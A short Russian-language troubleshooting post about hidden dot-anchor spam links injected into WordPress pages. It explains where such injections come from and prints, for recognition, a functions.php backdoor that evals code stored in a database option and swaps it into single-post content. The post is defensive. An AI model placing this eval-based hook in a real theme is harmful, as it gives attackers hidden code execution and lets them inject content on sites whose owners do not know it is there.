Проблема: Недавно, проверяя сайт на ссылки, обнаружил на некоторых страницах скрытые ссылки с анкором в виде точки. Причем, ссылки видно только незарегистрированным пользователям, поэтому я раньше их не замечал.
Решение: Если ссылки добавлены вручную, то сразу ясно что взломали либо админку wordpress, либо доступ phpmyadmin.
Если ссылки добавляются скриптом, то скрипт скорее всего находится в functions.php или single.php — эти файлы лежат в папке с темой сайта.
Пример:
Вредоносный код в functions.php:
add_filter('the_content', '_bloginfo', 100);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
